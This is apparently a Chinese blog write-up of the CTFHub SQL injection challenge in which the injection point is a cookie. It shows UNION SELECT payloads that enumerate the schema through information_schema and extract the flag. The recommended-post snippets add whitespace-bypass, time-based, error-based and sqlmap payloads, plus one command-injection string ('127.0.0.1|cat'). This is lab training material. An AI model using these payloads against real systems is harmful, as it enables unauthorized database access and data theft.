CTFHUB-SQL注入-Cookie注入

最新推荐文章于 2021-07-26 22:27:18 发布
最新推荐文章于 2021-07-26 22:27:18 发布
阅读量130 收藏
点赞数
分类专栏: CTFHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/118634552
版权

考点
Cookie注入
分析过程
抓包 发现
111
构造playload:

-1 union select database(),version()

在这里插入图片描述
库名有了
找表

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

在这里插入图片描述
在这里插入图片描述
得到wmgtielast
然后还是列名 查信息

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='wmgtielast'

得到ssdqqhyhum
在这里插入图片描述
查数据

id=-1 union select 1,group_concat(ssdqqhyhum) from wmgtielast

得到flag
在这里插入图片描述

ctfhub{e22dd90e7bd86e2e9696680d}
Pale1c
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php登录页面实现-SQL注入
03-07
php登录页面实现-SQL注入
CTFHub-sql注入-Cookie注入
weixin_51706044的博客
06-06 1178
文章目录Cookie注入解法二 Cookie注入 cookie注入和以往的题目有所不同,注入点是在cookie中 查看该页面的Cookie 可以看到这里的Cookie是id=1 进行测试是否为Cookie注入 burp进行抓包注入 判断列数 可以看到列数为2的时候回显正常,因此判断列数为2 进行联合查询 爆数据库 id=1 union select 1,database() 爆数据表 id=13 union select 1,group_concat(table_name) from inf
CTFHUB-WEB-SQL注入-cookie注入
weixin_43486981的博客
08-11 869
利用cookie值进行注入(把cookie值作为注入点) 题目: 靶机环境:可以看到页面没有可以输入的地方,根据题目,想到利用cookie值输入 使用burp suite抓包,在cookie值处输入注入语句,进行注入 查看回显位 求数据库名 求表名 求列名 求字段值,即可得到flag ...
CTFHub技能树web(持续更新)--SQL注入--Cookie注入
jiuyongpinyin的博客
09-05 587
Cookie注入 cookie注入和以往的题目有所不同,注入点是在cookie中,需要抓包查看: 这里的cookie是id=1,返回的数据和之前的题目相同,那么我们先使用order by 语句判断有几列: 经过测试,两列回显的正常的,接下来使用联合查询: 这里发现了数据回显,那么说明这么做的思路没问题,接下来就是爆破当前数据库了: 得到了当前的数据库,爆破数据库中的表名: 得到了表名,看看这个奇怪的表名里面的列: 得到了列名,接下来查看字段: 得到flag 当然,也可以使用更简便的sqlmap
CTFhub Cookie注入
plant1234的博客
06-18 724
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
CTFHubCookie注入
sGanYu
07-26 1841
手动注入 什么是cookie? 一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。当用户第一次访问页面的时候,服务器会生成一个用户特有的cookie,之后浏览器会根据用户设置的Cookie信息加载出内容,简单来说,cookie其实就是用户凭证的意思。 sqlmap注入 ...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
CTFHUB-SSRF(未完)
u014794539的博客
07-09 1395
内网访问 考点 内网访问… 分析过程 hint:尝试访问位于127.0.0.1的flag.php吧 http://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=_ 打开后是如此URL的空网页 构造playload http://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php 得到flagctfhub{507b549cdbc0cc91
CTFHUB-RCE-命令注入
u014794539的博客
07-10 1235
命令注入 无过滤 考点 属于是纯纯的命令注入 思路分析 构造playload 127.0.0.1|ls 发现一个数字串挺长的php 构造 127.0.0.1|cat 18930164348325.php 提交了[1]没有东西 可以构造 127.0.0.1|cat 18930164348325.php|base64 然后base64解码 或者不加base64 查看源码也能得到 playload: ctfhub{af6df24d6b085066d0dc46d3} 过滤cat 考点 过滤cat
CTFHUB-SQL注入-UA注入
u014794539的博客
07-10 1023
考点 SQL注入 UA注入 问题分析 他直说了UA注入点 可以跟Cookie注入一样弄 BP抓包发包 也可以直接sqlmap -u去跑 这几个题过程差不多 这里就用工具了 因为是UA注入了 所以用level3 python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 --dbs python2 sqlmap.py -u http://challenge-81256235
CTFHUB-SQL注入-过滤空格
u014794539的博客
07-10 862
考点 正常的注入 过滤了空格 需要绕过 过程分析 首先正常注入会提醒HACKER 经过尝试发现可以使用/**/代替空格绕过 获取数据库信息 0/**/union/**/select/**/1,database()/**/ 获取表信息 0/**/union/**/select/**/1,group_concat(table_name)/**/ from/**/information_schema.tables/**/where/**/table_schema='sqli' 得到表名whjmqubsk
CTFHUB-SQL注入-布尔盲注
u014794539的博客
07-10 606
考点布尔盲注 分析过程 想练习一下sqlmap工具的使用 于是 构造 playload: python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 --dbs 找到库名sqli 然后爆表 找到flag python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli --t
CTFHUB-SQL注入-refer注入
u014794539的博客
07-10 443
考点 sql refer注入 过程分析 hackbar发送refer 然后发送repeater抓包 GET / HTTP/1.1 Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml
CTFHUB-SQL注入-MySQL结构
u014794539的博客
07-10 425
考点 MySQL的数据库结构 数据库1 = 网站1 表明 列名 数据 数据库2 … 数据库3 … 分析过程 ?id=1 and 1=1 ?id=1 and 1=2 ?id=1' and1=1# 上句执行了下两句未执行 存在注入 查字段 1 order by 1 1 order by 2 1 order by 3 2执行 3不执行了 两个字段 查看当前数据库 233 union select 1,database() 库名还是sqli,看表 233 union select 1,grou
CTFHUB-SQL注入-时间盲注
u014794539的博客
07-10 412
考点 SQL时间盲注 时间盲注攻击 利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。 分析过程 1 and if(length(database())=5,sleep(3),1) 1 and if(length(database())=4,sleep(3),1) 1 and
CTFHUB-SQL注入-报错注入
u014794539的博客
07-10 405
报错注入 注入过程中经常根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要利用报错注入的方式来进行SQL注入了 十种MySql报错注入 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue() s
ctfhub sql注入cookie
最新发布
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值